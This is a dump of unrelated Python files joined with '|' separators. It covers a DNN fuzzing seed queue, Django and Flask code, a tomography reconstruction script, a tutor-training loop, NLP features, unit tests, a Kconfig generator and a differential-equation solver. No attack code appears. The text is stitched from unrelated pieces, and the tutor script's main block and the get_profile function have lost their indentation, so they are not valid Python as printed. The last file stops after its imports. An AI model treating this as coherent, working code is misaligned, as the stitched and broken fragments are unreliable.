        if self.sample_type == 'deeptest' and not coverage_inc:
            # If deeptest cannot increase the coverage, it will pop the last seed from the queue
            self.queue.pop()
        elif self.sample_type == 'prob':
            # Update the probability based on the Equation 3 in the paper
            if cur_seed.probability > self.REG_MIN and cur_seed.fuzzed_time < self.REG_GAMMA * (1 - self.REG_MIN):
                cur_seed.probability = self.REG_INIT_PROB - float(cur_seed.fuzzed_time) / self.REG_GAMMA

        if bug_found:
            # Log the initial seed from which we found the adversarial. It is for the statics of Table 6
            self.seed_attacked.add(cur_seed.root_seed)
            if not (cur_seed.parent in self.seed_attacked_first_time):
                # Log the information about when (which iteration) the initial seed is attacked successfully.
                self.seed_attacked_first_time[cur_seed.root_seed] = iteration

    def prob_next(self):
        """Grabs new input from corpus according to sample_function.

        Round-robin over the queue, accepting each seed with its current
        probability; wraps around until some seed is accepted.
        """
        while True:
            if self.current_id == len(self.queue):
                self.current_id = 0

            cur_seed = self.queue[self.current_id]
            if randint(0, 100) < cur_seed.probability * 100:
                # Based on the probability, we decide whether to select the current seed.
                cur_seed.fuzzed_time += 1
                self.current_id += 1
                return cur_seed
            else:
                self.current_id += 1
|
from django.contrib import admin
from .models import Newsletter, Recruitment
# Register your models here.
@admin.register(Newsletter)
class NewsletterAdmin(admin.ModelAdmin):
    """Admin changelist configuration for newsletter sign-ups."""

    # Fix: the original assigned to `display`, which is not a ModelAdmin
    # option and was silently ignored; `list_display` is what the changelist
    # reads. NOTE(review): the original also listed 'full_name' twice —
    # deduplicated here; confirm whether a second column was intended.
    list_display = ('full_name', 'time_stamp')
@admin.register(Recruitment)
class RecruitmentAdmin(admin.ModelAdmin):
    """Admin changelist configuration for recruitment entries."""

    # Fix: `display` is not a ModelAdmin option (it was silently ignored);
    # the changelist columns are configured via `list_display`.
    list_display = ('user', 'gender', 'date_created')
import tkinter as tk
import numpy
from PIL import Image, ImageTk
class ImageLabel(tk.Label):
    """A label with an updatable image."""

    def update_image(self, image: numpy.ndarray) -> None:
        """Render the given numpy array as this label's image."""
        photo = ImageTk.PhotoImage(Image.fromarray(image))
        self.config(image=photo)
        # Keep a reference on the widget: Tk does not hold one itself, and
        # without it the PhotoImage would be garbage-collected and go blank.
        self.image = photo
|
from flask import request, current_app
from flask_restful import Resource
from app import models
from app.api.schemas import CountdownResultSchema, CountdownResultsWithAdditionalDataSchema, CountdownResultsQuerySchema
from app.auth.views import current_user, authorized_or_403
from app.models import CountdownResult, db
class CountdownResultAPI(Resource):
    """REST endpoint for listing, bulk-creating and purging the current
    user's countdown results. All verbs require authorization."""

    def __init__(self):
        # Serializers for request parsing and response rendering.
        self.schema = CountdownResultSchema(many=True)
        self.get_schema = CountdownResultsWithAdditionalDataSchema(many=False)
        self.query_schema = CountdownResultsQuerySchema()

    @authorized_or_403
    def get(self, id=None):
        """Return results matching the query filters, plus the total count."""
        query_filters = self.query_schema.loads(request.args['data'])
        results, total = models.CountdownResult.find_by_query_parameter(
            query_filters, current_user.id)
        payload = dict(data=results, totalNumber=total)
        return self.get_schema.jsonify(payload)

    @authorized_or_403
    def post(self, id=None):
        """Bulk-create countdown results from the posted 'data' payload."""
        current_app.logger.info("Request data: %s", request.form)
        entries = self.schema.loads(request.form['data'])
        if entries:
            rows = [
                CountdownResult(entry['start_date'], entry['finish_date'],
                                entry['success'], current_user.id)
                for entry in entries
            ]
            db.session.add_all(rows)
            db.session.commit()
        return 'ok', 201

    @authorized_or_403
    def delete(self, id=None):
        """Delete every countdown result belonging to the current user."""
        current_app.logger.info('Got DELETE REQUEST')
        CountdownResult.delete_all_by_user_id(current_user.id)
        db.session.commit()
        current_app.logger.info('Countdown results has been successfully deleted.')
|
import pymr
import time
class IndexInverter(pymr.Solver):
    """MapReduce job that inverts a document index: for each word, collect
    the ids of the documents that contain it."""

    def reader(self):
        """Load the test-case file and return its non-empty lines."""
        with open('testcases/index.txt', 'r') as handle:
            text = handle.read()
        return text.strip().split('\n')

    def mapper(self, value):
        """Emit (word, doc_id) for every word in one 'doc_id word...' line."""
        time.sleep(0.1)  # simulate per-record work
        doc_id, *words = value.split()
        for word in words:
            yield word, doc_id

    def reducer(self, key, values):
        """Join all document ids for a word into one comma-separated string."""
        time.sleep(0.1)  # simulate per-key work
        yield key, ','.join(values)
if __name__ == '__main__':
    # Run the inverted-index job and print the resulting word -> doc-ids map.
    solver = IndexInverter()
    solver.solve()
    solver.print_result()
# Modules
import os
import sys
import tifffile
import numpy as np
import opt_functions as opt
import matplotlib.pyplot as plt
from pathlib import Path
# Data paths
proj_folder = Path(r'D:\OPTReconstructionData\M3_523_17wNIF_ASMA_Projections')
recon_folder = Path(r'C:\Users\david\Desktop\M3_523_17wNIF_ASMA_Reconstruction')
prefix = 'recon_'

# Initializations: read one projection to get the sinogram geometry.
proj_names = os.listdir(proj_folder)
proj_path = proj_folder / proj_names[0]
proj = tifffile.imread(str(proj_path))
height, width = proj.shape
angles = len(proj_names)
# NOTE(review): linspace includes the 2*pi endpoint, so the first and last
# projection angles coincide — confirm endpoint=False was not intended.
theta = np.linspace(0, 2 * np.pi, angles)
# Per-slice center of rotation (filled in during reconstruction).
cor = np.zeros(height)
tentative_cor = width // 2
# Search windows for the center-of-rotation scans (coarse, then fine).
coarse_range = 30
coarse_range = range(-coarse_range, coarse_range+1)
coarse_step = 1
init_fine_range = 7
init_fine_range = range(-init_fine_range, init_fine_range+1)
fine_range = 2
fine_range = range(-fine_range, fine_range+1)
fine_step = 0.125
# Tomograms are processed in chunks of at most max_height slices, starting
# from the middle slice, first ascending then descending.
max_height = 100
tomo_height = max_height
tomo_init = height // 2
tomo_start = tomo_init
tomo_indx = tomo_start
tomo_stop = tomo_start + min(tomo_height, height)
options = {'proj_type': 'cuda', 'method': 'FBP_CUDA'}
processing = True
init_cor = True
ascending = True
height_exception = False

print('Reconstruction started ...')
opt.tic()
max_prog = 50  # width of the ASCII progress bar
global_indx = 0
if height < max_prog:
    progress_bar = False
else:
    progress_bar = True

# Start tomogram processing
while processing:
    # Special case: trailing portions of the tomogram
    if height_exception:
        tomo_height = tomo_stop - tomo_start
    # Read tomogram
    tomo = np.zeros((angles, tomo_height, width))
    opt.read_tomo(str(proj_folder),
                  proj_names,
                  angles,
                  tomo,
                  tomo_start,
                  tomo_stop)
    # Initialize the center of rotation (first chunk only): coarse scan,
    # then fine scan, on the chunk's first slice.
    if init_cor:
        tentative_cor = opt.coarse_scan_cor(coarse_range,
                                            coarse_step,
                                            tentative_cor,
                                            tomo[:, 0, None, :],
                                            theta,
                                            options)
        tentative_cor, _ = opt.fine_scan_cor(init_fine_range,
                                             fine_step,
                                             tentative_cor,
                                             tomo[:, 0, None, :],
                                             theta,
                                             options)
        # Remember the middle-slice COR so the descending pass can restart from it.
        center_cor = tentative_cor
        init_cor = False
        if progress_bar:
            print('|' + max_prog*'-' + '| Reconstruction progress')
            sys.stdout.write('|'); sys.stdout.flush();
            part_prog = 0
    # Reconstruct tomogram: iterate slices toward the volume edge so the COR
    # estimate tracks gradual drift from the previous slice.
    if ascending:
        slice_range = range(tomo_height)
    else:
        slice_range = range(tomo_height-1, -1, -1)
    for slice_indx in slice_range:
        tentative_cor, recon = opt.fine_scan_cor(fine_range,
                                                 fine_step,
                                                 tentative_cor,
                                                 tomo[:, slice_indx, None, :],
                                                 theta,
                                                 options)
        cor[tomo_indx] = tentative_cor
        # Save individual slices
        recon_name = (prefix
                      + '{:0>4d}'.format(tomo_indx)
                      + '.tif')
        save_path = recon_folder / recon_name
        tifffile.imsave(save_path, recon)
        if progress_bar:
            if (global_indx >= part_prog*height/max_prog):
                sys.stdout.write('*'); sys.stdout.flush();
                part_prog += 1
            if (global_indx >= height-1):
                sys.stdout.write('| done \n'); sys.stdout.flush();
        global_indx += 1
        if ascending:
            tomo_indx += 1
        else:
            tomo_indx -= 1
    # Adjust tomogram indexes for next iteration
    if height_exception:
        tomo_height = max_height
        height_exception = False
    if ascending:
        if tomo_stop == height:
            # Reached the top: switch to the descending pass, restarting just
            # below the initial middle slice with the remembered COR.
            ascending = False
            tentative_cor = center_cor
            tomo_indx = tomo_init - 1
            tomo_stop = tomo_init
            tomo_start = tomo_stop - tomo_height
        else:
            tomo_start += tomo_height
            tomo_stop += tomo_height
            if tomo_stop > height:
                tomo_stop = height
                height_exception = True
    else:
        if tomo_start == 0:
            processing = False
        else:
            tomo_start -= tomo_height
            tomo_stop -= tomo_height
            if tomo_start < 0:
                tomo_start = 0
                height_exception = True

# Plot the list of centers of rotation used
plt.figure()
plt.plot(cor)
# Complete processing
eta_s = int(opt.toc())
eta_m = eta_s // 60
eta_s -= eta_m * 60
print(('Reconstruction complete (elapsed time: '
       + str(eta_m)
       + ' minutes, and '
       + str(eta_s)
       + ' seconds)'))
import gym
from stable_baselines.common import make_vec_env
from stable_baselines.common.policies import MlpPolicy
from stable_baselines import PPO2
import tutorenvs
from tutorenvs.multicolumn import MultiColumnAdditionDigitsEnv
from tutorenvs.multicolumn import MultiColumnAdditionSymbolic
import numpy as np
from pprint import pprint
from concept_formation.cobweb3 import Cobweb3Tree
from concept_formation.visualize import visualize
from tutorenvs.utils import DataShopLogger
def train_tree(n=10, logger=None):
    """Train a Cobweb3 tree on *n* multi-column addition problems.

    On each step the tree predicts a (selection, input) action for the
    current tutor state; if it cannot predict, or the action is rewarded
    negatively, a demonstration is requested and trained on instead.

    Args:
        n: number of complete problems to solve before returning.
        logger: optional DataShop-style logger passed to the environment.

    Returns:
        The trained Cobweb3Tree.
    """
    tree = Cobweb3Tree()
    env = MultiColumnAdditionSymbolic(logger=logger)

    p = 0        # problems completed so far
    nhints = 0   # demonstrations requested for the current problem
    while p < n:
        # make a copy of the state
        state = {a: env.state[a] for a in env.state}
        env.render()
        # Categorize the state and read off the predicted action parts.
        concept = tree.categorize(state)
        sel = concept.predict('selection')
        inp = concept.predict('input')
        if sel == "done":
            act = 'ButtonPressed'
        else:
            act = "UpdateField"
        sai = (sel, act, inp)
        # No usable prediction: fall back to a demonstration ("hint").
        if sel is None or inp is None:
            nhints += 1
            sai = env.request_demo()
            sai = (sai[0], sai[1], sai[2]['value'])
        reward = env.apply_sai(sai[0], sai[1], {'value': sai[2]})
        # print('reward', reward)
        if reward < 0:
            # Wrong action: request and apply the correct demonstration.
            nhints += 1
            sai = env.request_demo()
            sai = (sai[0], sai[1], sai[2]['value'])
            reward = env.apply_sai(sai[0], sai[1], {'value': sai[2]})
        # Train on the state labelled with the action that was applied.
        state['selection'] = sai[0]
        state['input'] = str(sai[2])
        tree.ifit(state)
        if sai[0] == "done" and reward == 1.0:
            print('# hints =', nhints)
            nhints = 0
            print("Problem %s of %s" % (p, n))
            p += 1
    return tree
if __name__ == "__main__":
logger = DataShopLogger('MulticolumnAdditionTutor', extra_kcs=['field'])
for _ in range(1):
tree = train_tree(200, logger)
visualize(tree)
# env = MultiColumnAdditionSymbolic()
# while True:
# sai = env.request_demo()
# env.apply_sai(sai[0], sai[1], sai[2])
# env.render()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-10-23 11:47
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: adds a 'color' field to the Board model."""

    dependencies = [
        ('todo', '0004_auto_20161023_1133'),
    ]

    operations = [
        migrations.AddField(
            model_name='board',
            name='color',
            # NOTE(review): choices pair integer values with hex-color labels
            # on a CharField (max_length=7 fits '#rrggbb'), so the stored value
            # is the stringified integer, not the color — confirm intended.
            field=models.CharField(choices=[(1, '#25a2a6'), (2, '#a4d05f'), (3, '#fddd62'), (4, '#f48f97')], default=1, max_length=7),
        ),
    ]
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db.models import F
from django.dispatch import receiver
from machina.apps.forum.signals import forum_viewed
@receiver(forum_viewed)
def update_forum_redirects_counter(sender, forum, user, request, response, **kwargs):
    """
    Receiver to handle the update of the link redirects counter associated with link forums.
    """
    # Only link-type forums with redirect counting enabled are tracked.
    if not (forum.is_link and forum.link_redirects):
        return
    # F() expression: let the database increment atomically instead of a
    # read-modify-write in Python.
    forum.link_redirects_count = F('link_redirects_count') + 1
    forum.save()
|
from .base_feature import BaseFeature
class POSFeature(BaseFeature):
    """CRF feature extractor over tagged token sequences.

    Builds the feature dict for token i of sentence s from a context window:
    surface features for positions -2..+2 and POS features back to -3, with
    BOS/EOS markers where the window runs off the sentence. Assumes each
    s[i] is a (word, pos_tag) pair — TODO confirm against the caller.
    """

    def word2features(self, s, i):
        word = s[i][0]
        # Current-token features. Underscore-joined compounds count as
        # titlecased only if every component is titlecased.
        features = {
            'bias' : 1.0,
            '[0]' : word,
            '[0].lower' : word.lower(),
            '[0].istitle': all(w.istitle() for w in word.split('_')),
        }
        if i > 0:
            # Previous token: surface, POS, and the bigram with the current word.
            word1 = s[i - 1][0]
            pos1 = s[i - 1][1]
            features.update({
                '[-1]' : word1,
                '[-1].lower' : word1.lower(),
                '[-1].istitle': all(w.istitle() for w in word1.split('_')),
                '[-1].pos' : pos1,
                '[-1,0]' : "%s %s" % (word1, word)
            })
            if i > 1:
                # Second-previous token plus the (-2,-1) word and POS bigrams.
                word2 = s[i - 2][0]
                pos2 = s[i - 2][1]
                features.update({
                    '[-2]': word2,
                    '[-2].lower' : word2.lower(),
                    '[-2].istitle': all(w.istitle() for w in word2.split('_')),
                    '[-2].pos' : pos2,
                    '[-2,-1]' : "%s %s" % (word2, word1),
                    '[-2,-1].pos' : "%s %s" % (pos2, pos1)
                })
                if i > 2:
                    # Third-previous token contributes POS features only.
                    pos3 = s[i - 3][1]
                    features.update({
                        '[-3].pos' : pos3,
                        '[-3,-2].pos' : "%s %s" % (pos3, pos2),
                    })
                else:
                    features['[-3].BOS'] = True
            else:
                features['[-2].BOS'] = True
        else:
            features['[-1].BOS'] = True
        if i < len(s) - 1:
            # Next token: surface features and the (0,+1) word bigram.
            word1 = s[i + 1][0]
            features.update({
                '[+1]' : word1,
                '[+1].lower' : word1.lower(),
                '[+1].istitle': all(w.istitle() for w in word1.split('_')),
                '[0,+1]' : "%s %s" % (word, word1)
            })
            if i < len(s) - 2:
                word2 = s[i + 2][0]
                features.update({
                    '[+2]' : word2,
                    '[+2].lower' : word2.lower(),
                    '[+2].istitle': all(w.istitle() for w in word2.split('_')),
                    '[+1,+2]' : "%s %s" % (word1, word2)
                })
            else:
                features['[+2].EOS'] = True
        else:
            features['[+1].EOS'] = True
        return features
|
from unittest import TestCase
from similarityPy.algorithms.standart_deviation import StandartDeviation
from tests import test_logger
__author__ = 'cenk'
class StandartDeviationTest(TestCase):
    """Tests for StandartDeviation.calculate on plain lists and on tuple
    lists where the value sits at a given index."""

    def setUp(self):
        pass

    def test_algorithm_with_list(self):
        """Sample standard deviation of a flat numeric list (4 d.p.)."""
        test_logger.debug("StandartDeviationTest - test_algorithm_with_list Starts")
        standart_deviation = StandartDeviation()
        data_list = [1, 2, 3, 4, 5]
        # Fix: assertEquals is a deprecated alias removed in Python 3.12;
        # use assertEqual.
        self.assertEqual(1.5811, standart_deviation.calculate(data_list))
        data_list = [1, 2, 3, 4]
        self.assertEqual(1.291, standart_deviation.calculate(data_list))
        test_logger.debug("StandartDeviationTest - test_algorithm_with_list Ends")

    def test_algorithm_with_tuple(self):
        """Same computation with the numeric value extracted via `index`."""
        test_logger.debug("StandartDeviationTest - test_algorithm_with_tuple Starts")
        standart_deviation = StandartDeviation()
        data_list = [("a", 1), ("b", 2), ("c", 3), ("d", 4), ("e", 5)]
        self.assertEqual(1.5811, standart_deviation.calculate(data_list, is_tuple=True, index=1))
        data_list = [("a", "a", 1), ("b", "b", 2), ("c", "c", 3), ("d", "d", 4), ("e", "e", 5)]
        self.assertEqual(1.5811, standart_deviation.calculate(data_list, is_tuple=True, index=2))
        data_list = [("a", "a", 1), ("b", "b", 2), ("c", "c", 3), ("d", "d", 4)]
        self.assertEqual(1.291, standart_deviation.calculate(data_list, is_tuple=True, index=2))
        test_logger.debug("StandartDeviationTest - test_algorithm_with_tuple Ends")
#!/usr/bin/env python
import os, sys, re
import shutil
from aos_parse_components import get_comp_name
# Global definitions
# Paths (relative to the source root) of the Kconfig files this tool rewrites.
top_config_in = "build/Config.in"
board_config_in = "board/Config.in"
example_config_in = "app/example/Config.in"
profile_config_in = "app/profile/Config.in"
# Markers wrapped around the auto-generated sections of emitted Config.in files.
autogen_start = "--- Generated Automatically ---"
autogen_end = "--- End ---"
def update_config_in(config_file, config_list):
    """Rewrite *config_file* in place, dropping `source` lines whose target
    Config.in is not present in *config_list*.

    linkkit templates reference their sources via a $SRCPATH prefix, which is
    expanded before the membership check. The file is only rewritten when at
    least one line survives.
    """
    source_line = re.compile(r'\s*source (.*)')
    kept = []
    with open(config_file, "r") as handle:
        for line in handle.readlines():
            match = source_line.match(line)
            if match:
                target = match.group(1)
                if "linkkit/" in config_file and "$SRCPATH" in target:
                    target = re.sub(r"\$SRCPATH/", "middleware/linkkit/sdk-c/", target)
                # Targets appear quoted in Kconfig; strip quotes to compare.
                if re.sub(r'"', "", target) not in config_list:
                    continue
            kept.append(line)
    if kept:
        with open(config_file, "w") as handle:
            handle.writelines(kept)
def get_opt_config(config_file, keyword, sdir):
    """Resolve a `select`-ed Kconfig option to the file that defines it.

    Scans *config_file* for `select <keyword>...` lines (the last match
    wins), then walks *sdir* looking for a sub-directory Config.in whose
    first line is `config <name>` or `menuconfig <name>`.

    Returns:
        (option_name, defining_config_path); either element is "" when
        nothing matched.
    """
    select_re = re.compile(r"\s+select\s+(%s.*?)(\s+if.*)?$" % keyword)
    opt_name = ""
    opt_config = ""
    with open(config_file, "r") as handle:
        for line in handle.readlines():
            found = select_re.match(line)
            if found:
                opt_name = found.group(1)
    if opt_name:
        define_re = re.compile(r"^(menuconfig|config)\s+(%s)$" % opt_name)
        for root, dirs, files in os.walk(sdir):
            # Only sub-directories count; sdir's own Config.in is skipped.
            if 'Config.in' not in files or root == sdir:
                continue
            with open("%s/Config.in" % root, "r") as handle:
                first_line = handle.readline().strip()
            if define_re.match(first_line):
                opt_config = "%s/Config.in" % root
                break
    return (opt_name, opt_config)
def create_board_config_in(config_file, config_list):
    """ Create board/Config.in

    Generates a Kconfig `choice` over all boards in *config_list*; for each
    board it also sources the matching MCU and arch Config.in files and sets
    AOS_BUILD_BOARD to the board's dotted directory name.
    """
    with open (config_file, "w") as cf:
        cf.write("# %s\n" % autogen_start)
        cf.write("menu \"BSP Configuration\"\n")
        cf.write("choice\n")
        cf.write("    prompt \"Select board\"\n")
        cf.write("\n")

        for config in config_list:
            # The board's option name is declared in its own Config.in as
            # `config AOS_BOARD_*` or `menuconfig AOS_BOARD_*`.
            patten = re.compile(r"^(menuconfig|config)\s+(AOS_BOARD_.*)$")
            config_name = ""
            with open(config, "r") as f:
                for line in f.readlines():
                    match = patten.match(line.strip())
                    if match:
                        config_name = match.group(2)
                        break
                else:
                    # for-else: no AOS_BOARD_* declaration found at all.
                    print("Error: boardname empty!")
                    return 1

            # Derive the dotted board directory from the config path.
            patten = re.compile(r".*board/(.*)/Config.in")
            match = patten.match(config)
            if match:
                boarddir = match.group(1).replace("/", ".")
            else:
                print("Error: can't get board directory")

            cf.write("source \"%s\"\n" % config)
            cf.write("if %s\n" % config_name)
            cf.write("    config AOS_BUILD_BOARD\n")
            cf.write("        default \"%s\"\n" % boarddir)
            cf.write("\n")
            # Chain in the MCU this board selects, and in turn the arch
            # that MCU selects.
            (mcu_name, mcu_config) = get_opt_config(config, "AOS_MCU_", "platform/mcu")
            if mcu_config:
                cf.write("    source \"%s\"\n" % mcu_config)
                (arch_name, arch_config) = get_opt_config(mcu_config, "AOS_ARCH_", "platform/arch")
                if arch_config:
                    cf.write("    source \"%s\"\n" % arch_config)
            cf.write("endif\n")
            cf.write("\n")

        cf.write("endchoice\n")
        cf.write("\n")
        cf.write("endmenu\n")
        cf.write("# %s\n" % autogen_end)
def create_app_config_in(config_file, config_list):
    """ Create app/*/Config.in files

    Generates a Kconfig `choice` over the example or profile apps in
    *config_list*, wrapped in an AOS_APP_EXAMPLE / AOS_APP_PROFILE gate
    depending on which file is being produced.
    """
    with open (config_file, "w") as cf:
        cf.write("# %s\n" % autogen_start)
        if "example/" in config_file:
            cf.write("config AOS_APP_EXAMPLE\n")
            cf.write("    bool \"Builtin Examples\"\n")
            cf.write("\n")
            cf.write("if AOS_APP_EXAMPLE\n")
            cf.write("choice\n")
            cf.write("    prompt \"Select example\"\n")
        if "profile/" in config_file:
            cf.write("config AOS_APP_PROFILE\n")
            cf.write("    bool \"Builtin Profiles\"\n")
            cf.write("\n")
            cf.write("if AOS_APP_PROFILE\n")
            cf.write("choice\n")
            cf.write("    prompt \"Select profile\"\n")
        cf.write("\n")

        for config in config_list:
            # The app's component name comes from its aos.mk, which sits
            # next to its Config.in.
            mkfile = re.sub(r"Config.in", r"aos.mk", config)
            appname = get_comp_name(mkfile)
            if not appname:
                print("Error: Can't get app name from %s" % mkfile)
                return 1

            # Derive the dotted app directory from the config path.
            patten = re.compile(r"app/(example|profile)/(.*)/Config.in")
            match = patten.match(config)
            if match:
                appdir = match.group(2).replace("/", ".")
            else:
                print("Error: can't get app directory")

            cf.write("source \"%s\"\n" % config)
            cf.write("if AOS_APP_%s\n" % appname.upper())
            cf.write("    config AOS_BUILD_APP\n")
            cf.write("        default \"%s\"\n" % appdir)
            cf.write("endif\n")
            cf.write("\n")

        cf.write("endchoice\n")
        cf.write("endif\n")
        cf.write("# %s\n" % autogen_end)
def update_top_config_in(top_config_in):
    """Extra cleanup for build/Config.in: remove every line that mentions
    NULL or Null (placeholder components), rewriting the file in place."""
    null_line = re.compile(r".*(NULL|Null).*")
    with open(top_config_in, "r") as handle:
        kept = [line for line in handle.readlines() if not null_line.match(line)]
    with open(top_config_in, "w") as handle:
        handle.writelines(kept)
def main():
    """Regenerate all Kconfig entry files from the installed components.

    Must run from the source root (checked via build/Makefile). Returns 1
    on error, None on success.
    """
    if not os.path.isfile("build/Makefile"):
        print("Error: %s must be run in Sources Root dir!\n" % sys.argv[0])
        return 1

    # Collect every Config.in in the tree (paths relative to the root).
    config_list = []
    source_root = "./"
    for root, dirs, files in os.walk(source_root):
        if 'Config.in' in files:
            # NOTE(review): str.replace removes every "./" occurrence, not just
            # the leading one — fine for typical paths, but worth confirming.
            config_file = "%s/Config.in" % root.replace(source_root, "")
            config_list += [config_file]
    if os.path.isfile("middleware/linkkit/sdk-c/Config.linkkit"):
        config_list += ["middleware/linkkit/sdk-c/Config.linkkit"]

    # Update config files according to installed comps
    for config_file in config_list:
        update_config_in(config_file, config_list)

    # Create board/Config.in
    board_config_list = []
    for config_file in config_list:
        if config_file.startswith("board/") and config_file != "board/Config.in":
            board_config_list += [config_file]
    if board_config_list:
        create_board_config_in(board_config_in, board_config_list)

    # Create app/example/Config.in
    example_config_list = []
    for config_file in config_list:
        if config_file.startswith("app/example") and config_file != "app/example/Config.in":
            example_config_list += [config_file]
    if example_config_list:
        create_app_config_in(example_config_in, example_config_list)

    # Create app/profile/Config.in
    profile_config_list = []
    for config_file in config_list:
        if config_file.startswith("app/profile") and config_file != "app/profile/Config.in":
            profile_config_list += [config_file]
    if profile_config_list:
        create_app_config_in(profile_config_in, profile_config_list)

    # Extra update for build/Config.in
    update_top_config_in(top_config_in)

if __name__ == "__main__":
    # NOTE(review): main()'s return code is discarded; the script always
    # exits 0 even on error.
    main()
|
# -*- coding: utf-8 -*-
"""
@author:XuMing(xuming624@qq.com)
@description:
"""
import addressparser
if __name__ == '__main__':
    # Sample Chinese shipping addresses of varying messiness (some embedded
    # in full "recipient/address/phone" strings).
    location_str = ["徐汇区虹漕路461号58号楼5楼",
                    "泉州市洛江区万安塘西工业区",
                    "朝阳区北苑华贸城",
                    "上海浦东新区城区昌邑路1669弄7号602(苗圃路口)",
                    "湖北天门市渔薪镇湖北省天门市三渔薪镇王湾村六组",
                    "收货人:xxx, 地址:湖北恩施州建始县业州镇湖北省建始县桂苑小区二单元111-2, 电话:13593643115",
                    "收货人:木鱼, 地址:浙江嘉兴市海宁市许村镇浙江省海宁市许村镇茗山村徐家石桥1号, 电话:13593643115",
                    ]
    # Parse into a DataFrame without word segmentation (cut=False).
    df = addressparser.transform(location_str, cut=False)
    print(df)
    # Print the extracted (province, city, district) triple per address.
    for map_key in zip(df["省"], df["市"], df["区"]):
        print(map_key)
|
# Read N events from stdin; each 'A' pushes one unit, anything else pops one.
# Valid iff no pop ever hits an empty counter and the counter ends at zero.
c = 0    # current open count
chk = 1  # stays 1 while no underflow has occurred
# Fix: iterate with range() instead of the obscure `' ' * int(input())`
# string-repetition idiom (same number of iterations, clearer intent).
for _ in range(int(input())):
    if input() == 'A':
        c += 1
    elif c > 0:
        c -= 1
    else:
        # Pop on an empty counter: mark invalid, but keep consuming input.
        chk = 0
print("YES" if chk and c == 0 else "NO")
# Imports
import numpy as np
from stablab.profile_solve_guess import profile_solve_guess
"""get_profile gets the profile of a """
def get_profile(p, s, tol=1e-8, sL=-10, sR=10, num_inf=2, timeout = 10):
# Set up the passed arguments into s.
s.update({'L': sL, 'R': sR})
max_err = 1+tol
# Begin solving until the error is small enough.
while max_err > tol:
# Solve the profile using the pseudo method.
[s,p] = profile_solve_guess(s,p,num_inf)
# Update the max_err to reflect the current profile.
max_err = max(abs(s['sol']['deval'](s['L'])[0] - np.array([s['UL']]).T))
max_err = max(max_err, max(abs(s['sol']['deval'](s['R'])[0] - np.array([s['UR']]).T)))
# Update numerical infinity to attempt a wider domain.
num_inf = 2*num_inf
# Update the timeout variable.
timeout -= 1
if timeout == 0:
print('Failed to solve the profile with timeout = '+str(timeout))
return s,p
print()
print('Boundary Error', max_err)
print('Ode Error', s['sol']['ode_err'])
print('Tol', tol)
#print(s['sol']['ode_err_full'])
# Return s, the solution and p, the parameters.
return s,p
|
# -*- coding: utf-8 -*-
import unittest
import tempfile
from os.path import join
from os.path import pardir
from os.path import sep
from collections import namedtuple
from calmjs.parse import utils
class UtilsTestCase(unittest.TestCase):
    """Tests for calmjs.parse.utils: generated tab-module naming and the
    Python-2-compatible repr helper."""

    def setUp(self):
        # Remember module globals that the tests monkey-patch.
        self.old_dist = utils.ply_dist
        self.py_major = utils.py_major

    def tearDown(self):
        # Restore the patched module globals.
        utils.ply_dist = self.old_dist
        utils.py_major = self.py_major

    def test_name_something(self):
        # a quick and dirty fake distribution: only .version is consulted.
        utils.ply_dist = namedtuple('Distribution', ['version'])('3.00')
        utils.py_major = 2
        lextab, yacctab = utils.generate_tab_names('some.package')
        self.assertEqual(lextab, 'some.lextab_package_py2_ply3_00')
        self.assertEqual(yacctab, 'some.yacctab_package_py2_ply3_00')

    def test_name_unknown(self):
        # No ply distribution detected -> 'plyunknown' suffix.
        utils.ply_dist = None
        utils.py_major = 3
        lextab, yacctab = utils.generate_tab_names('some.package')
        self.assertEqual(lextab, 'some.lextab_package_py3_plyunknown')
        self.assertEqual(yacctab, 'some.yacctab_package_py3_plyunknown')

    def test_repr_compat(self):
        # repr_compat strips the u'' prefix only when utils.unicode is the
        # type being repr'd (Python 2 semantics).
        class fake_unicode(object):
            def __repr__(self):
                return "u'fake'"

        previous = utils.unicode
        self.addCleanup(setattr, utils, 'unicode', previous)

        utils.unicode = fake_unicode
        self.assertEqual("'fake'", utils.repr_compat(fake_unicode()))
        utils.unicode = None
        self.assertEqual("u'fake'", utils.repr_compat(fake_unicode()))
class FileNormTestCase(unittest.TestCase):
    """Tests for utils.normrelpath.

    tempfile.mktemp() is used only to fabricate unique, non-existent base
    paths — nothing is created on disk.
    """

    def test_find_common_same_base_same_level(self):
        base = tempfile.mktemp()
        source = join(base, 'src', 'file.js')
        source_alt = join(base, 'src', 'alt', 'file.js')
        source_min = join(base, 'src', 'file.min.js')
        source_map = join(base, 'src', 'file.min.js.map')

        # for generation of sourceMappingURL comment in source_min
        self.assertEqual(
            'file.min.js.map', utils.normrelpath(source_min, source_map))

        # for pointing from source_map.source to the source
        self.assertEqual(
            'file.js', utils.normrelpath(source_map, source))

        # for pointing from source_map.source to the source_min
        self.assertEqual(
            'file.min.js', utils.normrelpath(source_map, source_min))

        self.assertEqual(
            join('alt', 'file.js'), utils.normrelpath(source_map, source_alt))

    def test_find_common_same_base_parents_common(self):
        base = tempfile.mktemp()
        source = join(base, 'src', 'file.js')
        source_min = join(base, 'build', 'file.min.js')
        source_map = join(base, 'build', 'file.min.js.map')

        # mapping from source_map to source crosses sibling directories.
        self.assertEqual([pardir, 'src', 'file.js'], utils.normrelpath(
            source_map, source).split(sep))

        # for pointing from source_map.source to the source_min
        self.assertEqual('file.min.js', utils.normrelpath(
            source_map, source_min))

    def test_find_double_parent(self):
        # Deeply nested target vs root-level file: two pardir hops up.
        base = tempfile.mktemp()
        root = join(base, 'file.js')
        nested = join(base, 'src', 'dir', 'blahfile.js')
        self.assertEqual([pardir, pardir, 'file.js'], utils.normrelpath(
            nested, root).split(sep))
        self.assertEqual(['src', 'dir', 'blahfile.js'], utils.normrelpath(
            root, nested).split(sep))

    def test_find_same_prefix(self):
        # Sibling dirs sharing a name prefix must not be treated as common.
        base = tempfile.mktemp()
        src = join(base, 'basesrc', 'source.js')
        tgt = join(base, 'basetgt', 'target.js')
        self.assertEqual([pardir, 'basetgt', 'target.js'], utils.normrelpath(
            src, tgt).split(sep))

    def test_relative_dirs_ignored(self):
        # When either side is already relative, the target is returned as-is.
        base = tempfile.mktemp()
        absolute = join(base, 'file.js')
        relative = join('somedir', 'file.js')
        self.assertEqual(relative, utils.normrelpath(absolute, relative))
        self.assertEqual(absolute, utils.normrelpath(relative, absolute))
|
# -*- coding: utf-8 -*-
# Create your views here.
from django.views.decorators.csrf import csrf_exempt
from django.core.exceptions import ObjectDoesNotExist
